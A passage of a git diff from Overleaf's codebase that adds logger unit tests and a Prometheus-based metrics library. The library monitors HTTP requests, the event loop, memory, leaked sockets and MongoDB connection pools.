{ + LoggingBunyan: sinon.stub().returns(this.stackdriverClient), + } + this.FileLogLevelChecker = { + start: sinon.stub(), + stop: sinon.stub(), + } + this.GCEMetadataLogLevelChecker = { + start: sinon.stub(), + stop: sinon.stub(), + } + this.LogLevelChecker = { + FileLogLevelChecker: sinon.stub().returns(this.FileLogLevelChecker), + GCEMetadataLogLevelChecker: sinon + .stub() + .returns(this.GCEMetadataLogLevelChecker), + } + this.LoggingManager = SandboxedModule.require(MODULE_PATH, { + requires: { + bunyan: this.Bunyan, + './log-level-checker': this.LogLevelChecker, + }, + }) + this.loggerName = 'test' + this.logger = this.LoggingManager.initialize(this.loggerName) + }) + + afterEach(function () { + this.LoggingManager.removeWarningHandler() + }) + + describe('initialize', function () { + beforeEach(function () { + this.Bunyan.createLogger.reset() + }) + + describe('not in production', function () { + beforeEach(function () { + this.logger = this.LoggingManager.initialize(this.loggerName) + }) + + it('should default to log level debug', function () { + this.Bunyan.createLogger.firstCall.args[0].streams[0].level.should.equal( + 'debug' + ) + }) + + it('should not instantiate a log level checker', function () { + expect(this.LoggingManager.logLevelChecker).not.to.exist + }) + }) + + describe('in production', function () { + beforeEach(function () { + process.env.NODE_ENV = 'production' + this.logger = this.LoggingManager.initialize(this.loggerName) + }) + + afterEach(function () { + delete process.env.NODE_ENV + }) + + it('should default to log level info', function () { + this.Bunyan.createLogger.firstCall.args[0].streams[0].level.should.equal( + 'info' + ) + }) + + it('should set up a file log level checker', function () { + expect(this.logger.logLevelChecker).to.equal(this.FileLogLevelChecker) + expect(this.FileLogLevelChecker.start).to.have.been.called + }) + }) + + describe('when LOG_LEVEL set in env', function () { + beforeEach(function () { + process.env.LOG_LEVEL = 'trace' + this.LoggingManager.initialize() + }) + + afterEach(function () { + delete process.env.LOG_LEVEL + }) + + it('should use custom log level', function () { + this.Bunyan.createLogger.firstCall.args[0].streams[0].level.should.equal( + 'trace' + ) + }) + }) + }) + + describe('bunyan logging', function () { + beforeEach(function () { + this.logArgs = [{ foo: 'bar' }, 'foo', 'bar'] + }) + + it('should log debug', function () { + this.logger.debug(this.logArgs) + this.bunyanLogger.debug.should.have.been.calledWith(this.logArgs) + }) + + it('should log error', function () { + this.logger.error(this.logArgs) + this.bunyanLogger.error.should.have.been.calledWith(this.logArgs) + }) + + it('should log fatal', function () { + this.logger.fatal(this.logArgs) + this.bunyanLogger.fatal.should.have.been.calledWith(this.logArgs) + }) + + it('should log info', function () { + this.logger.info(this.logArgs) + this.bunyanLogger.info.should.have.been.calledWith(this.logArgs) + }) + + it('should log warn', function () { + this.logger.warn(this.logArgs) + this.bunyanLogger.warn.should.have.been.calledWith(this.logArgs) + }) + + it('should log err', function () { + this.logger.err(this.logArgs) + this.bunyanLogger.error.should.have.been.calledWith(this.logArgs) + }) + }) + + describe('ringbuffer', function () { + beforeEach(function () { + this.logBufferMock = [ + { msg: 'log 1' }, + { msg: 'log 2' }, + { level: 50, msg: 'error' }, + ] + }) + + describe('when ring buffer size is positive', function () { + beforeEach(function () { + process.env.LOG_RING_BUFFER_SIZE = '20' + this.logger = this.LoggingManager.initialize(this.loggerName) + this.logger.ringBuffer.records = this.logBufferMock + this.logger.error({}, 'error') + }) + + afterEach(function () { + process.env.LOG_RING_BUFFER_SIZE = undefined + }) + + it('should include buffered logs in error log and filter out error logs in buffer', function () { + this.bunyanLogger.error.lastCall.args[0].logBuffer.should.deep.equal([ + { msg: 'log 1' }, + { msg: 'log 2' }, + ]) + }) + }) + + describe('when ring buffer size is zero', function () { + beforeEach(function () { + process.env.LOG_RING_BUFFER_SIZE = '0' + this.logger = this.LoggingManager.initialize(this.loggerName) + this.logger.error({}, 'error') + }) + + afterEach(function () { + process.env.LOG_RING_BUFFER_SIZE = undefined + }) + + it('should not include buffered logs in error log', function () { + expect(this.bunyanLogger.error.lastCall.args[0].logBuffer).be.undefined + }) + }) + }) +}) diff --git a/libraries/logger/tsconfig.json b/libraries/logger/tsconfig.json new file mode 100644 index 0000000..d43bb24 --- /dev/null +++ b/libraries/logger/tsconfig.json @@ -0,0 +1,7 @@ +{ + "extends": "../../tsconfig.backend.json", + "include": [ + "**/*.js", + "**/*.cjs" + ] +} diff --git a/libraries/metrics/.gitignore b/libraries/metrics/.gitignore new file mode 100644 index 0000000..2006c87 --- /dev/null +++ b/libraries/metrics/.gitignore @@ -0,0 +1,3 @@ +node_modules + +.npmrc diff --git a/libraries/metrics/.npmignore b/libraries/metrics/.npmignore new file mode 100644 index 0000000..879872f --- /dev/null +++ b/libraries/metrics/.npmignore @@ -0,0 +1,4 @@ +/.circleci +/.eslintrc +/.nvmrc +/.prettierrc diff --git a/libraries/metrics/.nvmrc b/libraries/metrics/.nvmrc new file mode 100644 index 0000000..0254b1e --- /dev/null +++ b/libraries/metrics/.nvmrc @@ -0,0 +1 @@ +20.18.2 diff --git a/libraries/metrics/CHANGELOG.md b/libraries/metrics/CHANGELOG.md new file mode 100644 index 0000000..30f24ea --- /dev/null +++ b/libraries/metrics/CHANGELOG.md @@ -0,0 +1,9 @@ +## v4.1.0 + +* Allows skipping the `sampleRate` argument. + +## v4.0.0 + +* Send unmodified request and response to logger. + +This version of the metrics module only works with versions of the `@overleaf/logger` module greater than v3.0.0 diff --git a/libraries/metrics/LICENSE b/libraries/metrics/LICENSE new file mode 100644 index 0000000..54e6916 --- /dev/null +++ b/libraries/metrics/LICENSE @@ -0,0 +1,21 @@ +The MIT License (MIT) + +Copyright (c) 2024 Overleaf + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in +all copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN +THE SOFTWARE. diff --git a/libraries/metrics/README.md b/libraries/metrics/README.md new file mode 100644 index 0000000..faf9c53 --- /dev/null +++ b/libraries/metrics/README.md @@ -0,0 +1,33 @@ +# overleaf/metrics-module + +Wrappers the [prom-client](https://github.com/siimon/prom-client) npm module to provide [Prometheus](https://prometheus.io/) metrics at `/metrics`. + +Use: + +``` +// Metrics must be initialized before importing anything else +require('@overleaf/metrics/initialize') + +const express = require('express') +const metrics = require('@overleaf/metrics') +const app = express() +metrics.injectMetricsRoute(app) +``` + +Request logging can be enabled: + +``` +const logger = require('@overleaf/logger') +... +app.use(metrics.http.monitor(logger)) +``` + +The metrics module can be configured through the following environment variables: + +- `DEBUG_METRICS` - enables display of debugging messages to the console. +- `GCP_OPENTELEMETRY` - enables OpenTelemetry tracing for GCP +- `JAEGER_OPENTELEMETRY` - enables OpenTelemetry tracing for Jaeger (in the dev environment) +- `METRICS_APP_NAME` - the app label for metrics and spans +- `METRICS_COMPRESSION_LEVEL` - sets the [compression level](https://www.npmjs.com/package/compression#level) for `/metrics` +- `STACKDRIVER_LOGGING` - toggles the request logging format +- `UV_THREADPOOL_SIZE` - sets the libuv [thread pool](http://docs.libuv.org/en/v1.x/threadpool.html) size diff --git a/libraries/metrics/buildscript.txt b/libraries/metrics/buildscript.txt new file mode 100644 index 0000000..74fcbdb --- /dev/null +++ b/libraries/metrics/buildscript.txt @@ -0,0 +1,10 @@ +metrics +--dependencies=None +--docker-repos=gcr.io/overleaf-ops +--env-add= +--env-pass-through= +--esmock-loader=False +--is-library=True +--node-version=20.18.2 +--public-repo=False +--script-version=4.7.0 diff --git a/libraries/metrics/event_loop.js b/libraries/metrics/event_loop.js new file mode 100644 index 0000000..b255c4f --- /dev/null +++ b/libraries/metrics/event_loop.js @@ -0,0 +1,34 @@ +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +module.exports = { + monitor(logger, interval, logThreshold) { + if (interval == null) { + interval = 1000 + } + if (logThreshold == null) { + logThreshold = 100 + } + const Metrics = require('./index') + // check for logger on startup to avoid exceptions later if undefined + if (logger == null) { + throw new Error('logger is undefined') + } + // monitor delay in setInterval to detect event loop blocking + let previous = Date.now() + const intervalId = setInterval(function () { + const now = Date.now() + const offset = now - previous - interval + if (offset > logThreshold) { + logger.warn({ offset }, 'slow event loop') + } + previous = now + return Metrics.timing('event-loop-millsec', offset) + }, interval) + + return Metrics.registerDestructor(() => clearInterval(intervalId)) + }, +} diff --git a/libraries/metrics/http.js b/libraries/metrics/http.js new file mode 100644 index 0000000..4356852 --- /dev/null +++ b/libraries/metrics/http.js @@ -0,0 +1,78 @@ +const Metrics = require('./index') + +function monitor(logger, level = 'debug') { + return function (req, res, next) { + const startTime = Date.now() + req.logger = new RequestLogger(logger, level) + const { end } = res + res.end = function (...args) { + end.apply(this, args) + const responseTimeMs = Date.now() - startTime + const requestSize = parseInt(req.headers['content-length'], 10) + const routePath = getRoutePath(req) + + if (routePath != null) { + Metrics.timing('http_request', responseTimeMs, null, { + method: req.method, + status_code: res.statusCode, + path: routePath, + }) + if (requestSize) { + Metrics.summary('http_request_size_bytes', requestSize, { + method: req.method, + status_code: res.statusCode, + path: routePath, + }) + } + } + req.logger.addFields({ responseTimeMs }) + req.logger.emit(req, res) + } + next() + } +} + +function getRoutePath(req) { + if (req.route && req.route.path != null) { + return req.route.path + .toString() + .replace(/\//g, '_') + .replace(/:/g, '') + .slice(1) + } + if (req.swagger && req.swagger.apiPath != null) { + return req.swagger.apiPath + } + return null +} + +class RequestLogger { + constructor(logger, level) { + this._logger = logger + this._level = level + this._info = {} + } + + addFields(fields) { + Object.assign(this._info, fields) + } + + setLevel(level) { + this._level = level + } + + disable() { + this._disabled = true + } + + emit(req, res) { + if (this._disabled) { + return + } + this.addFields({ req, res }) + const url = req.originalUrl || req.url + this._logger[this._level](this._info, '%s %s', req.method, url) + } +} + +module.exports.monitor = monitor diff --git a/libraries/metrics/index.js b/libraries/metrics/index.js new file mode 100644 index 0000000..257e863 --- /dev/null +++ b/libraries/metrics/index.js @@ -0,0 +1,182 @@ +/* eslint-disable no-console */ + +const ExpressCompression = require('compression') +const promClient = require('prom-client') +const promWrapper = require('./prom_wrapper') + +const destructors = [] + +require('./uv_threadpool_size') + +function registerDestructor(func) { + destructors.push(func) +} + +function injectMetricsRoute(app) { + app.get( + '/metrics', + ExpressCompression({ + level: parseInt(process.env.METRICS_COMPRESSION_LEVEL || '1', 10), + }), + function (req, res, next) { + res.set('Content-Type', promWrapper.registry.contentType) + promWrapper.registry + .metrics() + .then(metrics => { + res.end(metrics) + }) + .catch(err => { + next(err) + }) + } + ) +} + +function buildPromKey(key) { + return key.replace(/[^a-zA-Z0-9]/g, '_') +} + +function sanitizeValue(value) { + return parseFloat(value) +} + +function set(key, value, sampleRate = 1) { + console.log('counts are not currently supported') +} + +function inc(key, sampleRate = 1, labels = {}) { + if (arguments.length === 2 && typeof sampleRate === 'object') { + labels = sampleRate + } + + key = buildPromKey(key) + promWrapper.metric('counter', key, labels).inc(labels) + if (process.env.DEBUG_METRICS) { + console.log('doing inc', key, labels) + } +} + +function count(key, count, sampleRate = 1, labels = {}) { + if (arguments.length === 3 && typeof sampleRate === 'object') { + labels = sampleRate + } + + key = buildPromKey(key) + promWrapper.metric('counter', key, labels).inc(labels, count) + if (process.env.DEBUG_METRICS) { + console.log('doing count/inc', key, labels) + } +} + +function summary(key, value, labels = {}) { + key = buildPromKey(key) + promWrapper.metric('summary', key, labels).observe(labels, value) + if (process.env.DEBUG_METRICS) { + console.log('doing summary', key, value, labels) + } +} + +function timing(key, timeSpan, sampleRate = 1, labels = {}) { + if (arguments.length === 3 && typeof sampleRate === 'object') { + labels = sampleRate + } + + key = buildPromKey('timer_' + key) + promWrapper.metric('summary', key, labels).observe(labels, timeSpan) + if (process.env.DEBUG_METRICS) { + console.log('doing timing', key, labels) + } +} + +function histogram(key, value, buckets, labels = {}) { + key = buildPromKey('histogram_' + key) + promWrapper.metric('histogram', key, labels, buckets).observe(labels, value) + if (process.env.DEBUG_METRICS) { + console.log('doing histogram', key, buckets, labels) + } +} + +class Timer { + constructor(key, sampleRate = 1, labels = {}, buckets = undefined) { + if (typeof sampleRate === 'object') { + // called with (key, labels, buckets) + if (arguments.length === 3) { + buckets = labels + labels = sampleRate + } + + // called with (key, labels) + if (arguments.length === 2) { + labels = sampleRate + } + + sampleRate = 1 // default value to pass to timing function + } + + this.start = new Date() + key = buildPromKey(key) + this.key = key + this.sampleRate = sampleRate + this.labels = labels + this.buckets = buckets + } + + // any labels passed into the done method override labels from constructor + done(labels = {}) { + const timeSpan = new Date() - this.start + if (this.buckets) { + histogram(this.key, timeSpan, this.buckets, { ...this.labels, ...labels }) + } else { + timing(this.key, timeSpan, this.sampleRate, { ...this.labels, ...labels }) + } + return timeSpan + } +} + +function gauge(key, value, sampleRate = 1, labels = {}) { + if (arguments.length === 3 && typeof sampleRate === 'object') { + labels = sampleRate + } + + key = buildPromKey(key) + promWrapper.metric('gauge', key, labels).set(labels, sanitizeValue(value)) + if (process.env.DEBUG_METRICS) { + console.log('doing gauge', key, labels) + } +} + +function globalGauge(key, value, sampleRate = 1, labels = {}) { + key = buildPromKey(key) + labels = { host: 'global', ...labels } + promWrapper.metric('gauge', key, labels).set(labels, sanitizeValue(value)) +} + +function close() { + for (const func of destructors) { + func() + } +} + +module.exports.registerDestructor = registerDestructor +module.exports.injectMetricsRoute = injectMetricsRoute +module.exports.buildPromKey = buildPromKey +module.exports.sanitizeValue = sanitizeValue +module.exports.set = set +module.exports.inc = inc +module.exports.count = count +module.exports.summary = summary +module.exports.timing = timing +module.exports.histogram = histogram +module.exports.Timer = Timer +module.exports.gauge = gauge +module.exports.globalGauge = globalGauge +module.exports.close = close +module.exports.prom = promClient +module.exports.register = promWrapper.registry + +module.exports.http = require('./http') +module.exports.open_sockets = require('./open_sockets') +module.exports.leaked_sockets = require('./leaked_sockets') +module.exports.event_loop = require('./event_loop') +module.exports.memory = require('./memory') +module.exports.mongodb = require('./mongodb') diff --git a/libraries/metrics/initialize.js b/libraries/metrics/initialize.js new file mode 100644 index 0000000..1028ee0 --- /dev/null +++ b/libraries/metrics/initialize.js @@ -0,0 +1,105 @@ +/* eslint-disable no-console */ + +/** + * This module initializes the metrics module. It should be imported once + * before any other module to support code instrumentation. + */ + +const APP_NAME = process.env.METRICS_APP_NAME || 'unknown' +const BUILD_VERSION = process.env.BUILD_VERSION +const ENABLE_PROFILE_AGENT = process.env.ENABLE_PROFILE_AGENT === 'true' +const GCP_OPENTELEMETRY = process.env.GCP_OPENTELEMETRY === 'true' +const JAEGER_OPENTELEMETRY = process.env.JAEGER_OPENTELEMETRY === 'true' + +console.log('Initializing metrics') + +if (GCP_OPENTELEMETRY || JAEGER_OPENTELEMETRY) { + initializeOpenTelemetryInstrumentation() + initializeOpenTelemetryLogging() +} + +if (ENABLE_PROFILE_AGENT) { + initializeProfileAgent() +} + +initializePrometheus() +initializePromWrapper() +recordProcessStart() + +function initializeOpenTelemetryInstrumentation() { + console.log('Starting OpenTelemetry instrumentation') + const opentelemetry = require('@opentelemetry/sdk-node') + const { + getNodeAutoInstrumentations, + } = require('@opentelemetry/auto-instrumentations-node') + const { Resource } = require('@opentelemetry/resources') + const { + SemanticResourceAttributes, + } = require('@opentelemetry/semantic-conventions') + + const resource = new Resource({ + [SemanticResourceAttributes.SERVICE_NAME]: APP_NAME, + [SemanticResourceAttributes.SERVICE_NAMESPACE]: 'Overleaf', + 'host.type': 'VM', + }) + + let exporter + if (GCP_OPENTELEMETRY) { + const GCP = require('@google-cloud/opentelemetry-cloud-trace-exporter') + exporter = new GCP.TraceExporter() + } else if (JAEGER_OPENTELEMETRY) { + const { + OTLPTraceExporter, + } = require('@opentelemetry/exporter-trace-otlp-http') + exporter = new OTLPTraceExporter({ + url: `http://${process.env.JAEGER_HOST || 'jaeger'}:4318/v1/traces`, + }) + } else { + return + } + + const sdk = new opentelemetry.NodeSDK({ + traceExporter: exporter, + logger: console, + instrumentations: [getNodeAutoInstrumentations()], + resource, + }) + sdk.start() +} + +function initializeOpenTelemetryLogging() { + const { + diag, + DiagConsoleLogger, + DiagLogLevel, + } = require('@opentelemetry/api') + diag.setLogger(new DiagConsoleLogger(), DiagLogLevel.INFO) +} + +function initializeProfileAgent() { + console.log('Starting Google Profile Agent') + const profiler = require('@google-cloud/profiler') + profiler.start({ + serviceContext: { + service: APP_NAME, + version: BUILD_VERSION, + }, + }) +} + +function initializePrometheus() { + const os = require('node:os') + const promClient = require('prom-client') + promClient.register.setDefaultLabels({ app: APP_NAME, host: os.hostname() }) + promClient.collectDefaultMetrics({ timeout: 5000, prefix: '' }) +} + +function initializePromWrapper() { + const promWrapper = require('./prom_wrapper') + promWrapper.setupSweeping() +} + +function recordProcessStart() { + const metrics = require('.') + metrics.inc('process_startup') +} diff --git a/libraries/metrics/leaked_sockets.js b/libraries/metrics/leaked_sockets.js new file mode 100644 index 0000000..d250fc4 --- /dev/null +++ b/libraries/metrics/leaked_sockets.js @@ -0,0 +1,254 @@ +/** + * This file monitors HTTP connections in Node.js and logs any potential socket leaks. + * It uses the `diagnostics_channel` module to intercept requests and reponses in the + * `http` module and tracks the lifetime of each http socket. If a socket is open for + * longer than a specified time, it is considered a potential leak and its details are + * logged along with the corresponding information from /proc/net/tcp. + */ + +const fs = require('node:fs') +const diagnosticsChannel = require('node:diagnostics_channel') + +const SOCKET_MONITOR_INTERVAL = 60 * 1000 +// set the threshold for logging leaked sockets in minutes, defaults to 15 +const MIN_SOCKET_LEAK_TIME = + (parseInt(process.env.LEAKED_SOCKET_AGE_THRESHOLD, 10) || 15) * 60 * 1000 + +// Record HTTP events using diagnostics_channel +diagnosticsChannel.subscribe('http.client.request.start', handleRequest) +diagnosticsChannel.subscribe('http.server.request.start', handleRequest) +diagnosticsChannel.subscribe('http.client.response.finish', handleResponse) +diagnosticsChannel.subscribe('http.server.response.finish', handleResponse) + +function handleRequest({ request: req }) { + const socket = req?.socket + if (socket) { + recordRequest(req, socket) + } +} + +function recordRequest(req, socket) { + const { method, protocol, path, url, rawHeaders, _header } = req + socket._ol_debug = { + method, + protocol, + url: url ?? path, + request: { headers: rawHeaders ?? _header, ts: new Date() }, + } +} + +function handleResponse({ request: req, response: res }) { + const socket = req?.socket || res?.socket + if (!socket || !res) { + return + } + if (!socket._ol_debug) { + // I don't know if this will ever happen, but if we missed the request, + // record it here. + recordRequest(req, socket) + } + const { statusCode, statusMessage, headers, _header } = res + Object.assign(socket._ol_debug, { + response: { + statusCode, + statusMessage, + headers: headers ?? _header, + ts: new Date(), + }, + }) +} + +// Additional functions to log request headers with sensitive information redacted + +function flattenHeaders(rawHeaders) { + // Headers can be an array [KEY, VALUE, KEY, VALUE, ..] + // an object {key:value, key:value, ...} + // or a string of the headers separated by \r\n + // Flatten the array and object headers into the string form. + if (Array.isArray(rawHeaders)) { + return rawHeaders + .map((item, index) => (index % 2 === 0 ? `${item}: ` : `${item}\r\n`)) + .join('') + } else if (typeof rawHeaders === 'object') { + return Object.entries(rawHeaders) + .map(([key, value]) => `${key}: ${value}\r\n`) + .join('') + } else if (typeof rawHeaders === 'string') { + return rawHeaders + } else { + return JSON.stringify(rawHeaders) + } +} + +const REDACT_REGEX = /^(Authorization|Set-Cookie|Cookie):.*?\r/gim + +function redactObject(obj) { + const result = {} + for (const [key, value] of Object.entries(obj)) { + if (value == null) { + result[key] = null + } else if (key === 'headers') { + // remove headers with sensitive information + result[key] = flattenHeaders(value).replace( + REDACT_REGEX, + `$1: REDACTED\r` + ) + } else if ( + typeof value === 'object' && + ['request', 'response'].includes(key) + ) { + result[key] = redactObject(value) + } else { + result[key] = value + } + } + return result +} + +// Check if an old socket has crossed the threshold for logging. +// We log multiple times with an exponential backoff so we can +// see how long a socket hangs around. + +function isOldSocket(handle) { + const now = new Date() + const created = handle._ol_debug.request.ts + const lastLoggedAt = handle._ol_debug.lastLoggedAt ?? created + const nextLogTime = new Date( + created.getTime() + + Math.max(2 * (lastLoggedAt - created), MIN_SOCKET_LEAK_TIME) + ) + return now >= nextLogTime +} + +function logOldSocket(logger, handle, tcpinfo) { + const now = new Date() + const info = Object.assign( + { + localAddress: handle.localAddress, + localPort: handle.localPort, + remoteAddress: handle.remoteAddress, + remotePort: handle.remotePort, + tcpinfo, + age: Math.floor((now - handle._ol_debug.request.ts) / (60 * 1000)), // age in minutes + }, + redactObject(handle._ol_debug) + ) + handle._ol_debug.lastLoggedAt = now + if (tcpinfo) { + logger.error(info, 'old socket handle - tcp socket') + } else { + logger.warn(info, 'stale socket handle - no entry in /proc/net/tcp') + } +} + +// Correlate socket handles with /proc/net/tcp entries using a key based on the +// local and remote addresses and ports. This will allow us to distinguish between +// sockets that are still open and sockets that have been closed and removed from +// the /proc/net/tcp table but are still present in the node active handles array. + +async function getOpenSockets() { + // get open sockets remote and local address:port from /proc/net/tcp + const procNetTcp = '/proc/net/tcp' + const openSockets = new Map() + const lines = await fs.promises.readFile(procNetTcp, 'utf8') + for (const line of lines.split('\n')) { + const socket = parseProcNetTcp(line) + if (socket) { + openSockets.set(socket, line) + } + } + return openSockets +} + +function keyFromSocket(socket) { + return `${socket.localAddress}:${socket.localPort} -> ${socket.remoteAddress}:${socket.remotePort}` +} + +function decodeHexIpAddress(hex) { + // decode hex ip address to dotted decimal notation + const ip = parseInt(hex, 16) + const a = ip & 0xff + const b = (ip >> 8) & 0xff + const c = (ip >> 16) & 0xff + const d = (ip >> 24) & 0xff + return `${a}.${b}.${c}.${d}` +} + +function decodeHexPort(hex) { + // decode hex port to decimal + return parseInt(hex, 16) +} + +// Regex for extracting the local and remote addresses and ports from the /proc/net/tcp output +// Example line: +// 16: AB02A8C0:D9E2 86941864:01BB 01 00000000:00000000 02:000004BE 00000000 0 0 36802 2 0000000000000000 28 4 26 10 -1 +// ^^^^^^^^^^^^^ ^^^^^^^^^^^^^ +// local remote + +const TCP_STATE_REGEX = + /^\s*\d+:\s+(?[0-9A-F]{8}):(?[0-9A-F]{4})\s+(?[0-9A-F]{8}):(?[0-9A-F]{4})/i + +function parseProcNetTcp(line) { + const match = line.match(TCP_STATE_REGEX) + if (match) { + const { localHexAddress, localHexPort, remoteHexAddress, remoteHexPort } = + match.groups + return keyFromSocket({ + localAddress: decodeHexIpAddress(localHexAddress), + localPort: decodeHexPort(localHexPort), + remoteAddress: decodeHexIpAddress(remoteHexAddress), + remotePort: decodeHexPort(remoteHexPort), + }) + } +} + +let LeakedSocketsMonitor + +// Export the monitor and scanSockets functions + +module.exports = LeakedSocketsMonitor = { + monitor(logger) { + const interval = setInterval( + () => LeakedSocketsMonitor.scanSockets(logger), + SOCKET_MONITOR_INTERVAL + ) + const Metrics = require('./index') + return Metrics.registerDestructor(() => clearInterval(interval)) + }, + scanSockets(logger) { + const debugSockets = process._getActiveHandles().filter(handle => { + return handle._ol_debug + }) + + // Bail out if there are no sockets with the _ol_debug property + if (debugSockets.length === 0) { + return + } + + const oldSockets = debugSockets.filter(isOldSocket) + + // Bail out if there are no old sockets to log + if (oldSockets.length === 0) { + return + } + + // If there old sockets to log, get the connections from /proc/net/tcp + // to distinguish between sockets that are still open and sockets that + // have been closed and removed from the /proc/net/tcp table. + getOpenSockets() + .then(openSockets => { + oldSockets.forEach(handle => { + try { + const key = keyFromSocket(handle) + const tcpinfo = openSockets.get(key) + logOldSocket(logger, handle, tcpinfo) + } catch (err) { + logger.error({ err }, 'error in scanSockets') + } + }) + }) + .catch(err => { + logger.error({ err }, 'error getting open sockets') + }) + }, +} diff --git a/libraries/metrics/memory.js b/libraries/metrics/memory.js new file mode 100644 index 0000000..73dc18c --- /dev/null +++ b/libraries/metrics/memory.js @@ -0,0 +1,113 @@ +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +// record memory usage each minute and run a periodic gc(), keeping cpu +// usage within allowable range of 1ms per minute. Also, dynamically +// adjust the period between gc()'s to reach a target of the gc saving +// 4 megabytes each time. + +let MemoryMonitor +const oneMinute = 60 * 1000 +const oneMegaByte = 1024 * 1024 + +let CpuTimeBucket = 100 // current cpu time allowance in milliseconds +const CpuTimeBucketMax = 100 // maximum amount of cpu time allowed in bucket +const CpuTimeBucketRate = 10 // add this many milliseconds per minute + +let gcInterval = 1 // how many minutes between gc (parameter is dynamically adjusted) +let countSinceLastGc = 0 // how many minutes since last gc +const MemoryChunkSize = 4 // how many megabytes we need to free to consider gc worth doing + +const readyToGc = function () { + // update allowed cpu time + CpuTimeBucket = CpuTimeBucket + CpuTimeBucketRate + CpuTimeBucket = + CpuTimeBucket < CpuTimeBucketMax ? CpuTimeBucket : CpuTimeBucketMax + // update counts since last gc + countSinceLastGc = countSinceLastGc + 1 + // check there is enough time since last gc and we have enough cpu + return countSinceLastGc > gcInterval && CpuTimeBucket > 0 +} + +const executeAndTime = function (fn) { + // time the execution of fn() and subtract from cpu allowance + const t0 = process.hrtime() + fn() + const dt = process.hrtime(t0) + const timeTaken = (dt[0] + dt[1] * 1e-9) * 1e3 // in milliseconds + CpuTimeBucket -= Math.ceil(timeTaken) + return timeTaken +} + +const inMegaBytes = function (obj) { + // convert process.memoryUsage hash {rss,heapTotal,heapFreed} into megabytes + const result = {} + for (const k in obj) { + const v = obj[k] + result[k] = (v / oneMegaByte).toFixed(2) + } + return result +} + +const updateMemoryStats = function (oldMem, newMem) { + countSinceLastGc = 0 + const delta = {} + for (const k in newMem) { + delta[k] = (newMem[k] - oldMem[k]).toFixed(2) + } + // take the max of all memory measures + const savedMemory = Math.max(-delta.rss, -delta.heapTotal, -delta.heapUsed) + delta.megabytesFreed = savedMemory + // did it do any good? + if (savedMemory < MemoryChunkSize) { + gcInterval = gcInterval + 1 // no, so wait longer next time + } else { + gcInterval = Math.max(gcInterval - 1, 1) // yes, wait less time + } + return delta +} + +module.exports = MemoryMonitor = { + monitor(logger) { + const interval = setInterval(() => MemoryMonitor.Check(logger), oneMinute) + const Metrics = require('./index') + return Metrics.registerDestructor(() => clearInterval(interval)) + }, + + Check(logger) { + let mem + const Metrics = require('./index') + const memBeforeGc = (mem = inMegaBytes(process.memoryUsage())) + Metrics.gauge('memory.rss', mem.rss) + Metrics.gauge('memory.heaptotal', mem.heapTotal) + Metrics.gauge('memory.heapused', mem.heapUsed) + Metrics.gauge('memory.gc-interval', gcInterval) + // Metrics.gauge("memory.cpu-time-bucket", CpuTimeBucket) + + logger.debug(mem, 'process.memoryUsage()') + + if (global.gc != null && readyToGc()) { + const gcTime = executeAndTime(global.gc).toFixed(2) + const memAfterGc = inMegaBytes(process.memoryUsage()) + const deltaMem = updateMemoryStats(memBeforeGc, memAfterGc) + logger.debug( + { + gcTime, + memBeforeGc, + memAfterGc, + deltaMem, + gcInterval, + CpuTimeBucket, + }, + 'global.gc() forced' + ) + // Metrics.timing("memory.gc-time", gcTime) + Metrics.gauge('memory.gc-rss-freed', -deltaMem.rss) + Metrics.gauge('memory.gc-heaptotal-freed', -deltaMem.heapTotal) + return Metrics.gauge('memory.gc-heapused-freed', -deltaMem.heapUsed) + } + }, +} diff --git a/libraries/metrics/mongodb.js b/libraries/metrics/mongodb.js new file mode 100644 index 0000000..c9f4e0b --- /dev/null +++ b/libraries/metrics/mongodb.js @@ -0,0 +1,84 @@ +const { Gauge, Summary } = require('prom-client') + +function monitor(mongoClient) { + const labelNames = ['mongo_server'] + const poolSize = new Gauge({ + name: 'mongo_connection_pool_size', + help: 'number of connections in the connection pool', + labelNames, + // Use this one metric's collect() to set all metrics' values. + collect, + }) + const availableConnections = new Gauge({ + name: 'mongo_connection_pool_available', + help: 'number of connections that are not busy', + labelNames, + }) + const waitQueueSize = new Gauge({ + name: 'mongo_connection_pool_waiting', + help: 'number of operations waiting for an available connection', + labelNames, + }) + const maxPoolSize = new Gauge({ + name: 'mongo_connection_pool_max', + help: 'max size for the connection pool', + labelNames, + }) + + const mongoCommandTimer = new Summary({ + name: 'mongo_command_time', + help: 'time taken to complete a mongo command', + percentiles: [], + labelNames: ['status', 'method'], + }) + + if (mongoClient.on) { + mongoClient.on('commandSucceeded', event => { + mongoCommandTimer.observe( + { + status: 'success', + method: event.commandName === 'find' ? 'read' : 'write', + }, + event.duration + ) + }) + + mongoClient.on('commandFailed', event => { + mongoCommandTimer.observe( + { + status: 'failed', + method: event.commandName === 'find' ? 'read' : 'write', + }, + event.duration + ) + }) + } + + function collect() { + // Reset all gauges in case they contain values for servers that + // disappeared + poolSize.reset() + availableConnections.reset() + waitQueueSize.reset() + maxPoolSize.reset() + + const servers = mongoClient.topology?.s?.servers + if (servers != null) { + for (const [address, server] of servers) { + // The server object is different between v4 and v5 (c.f. https://github.com/mongodb/node-mongodb-native/pull/3645) + const pool = server.s?.pool || server.pool + if (pool == null) { + continue + } + + const labels = { mongo_server: address } + poolSize.set(labels, pool.totalConnectionCount) + availableConnections.set(labels, pool.availableConnectionCount) + waitQueueSize.set(labels, pool.waitQueueSize) + maxPoolSize.set(labels, 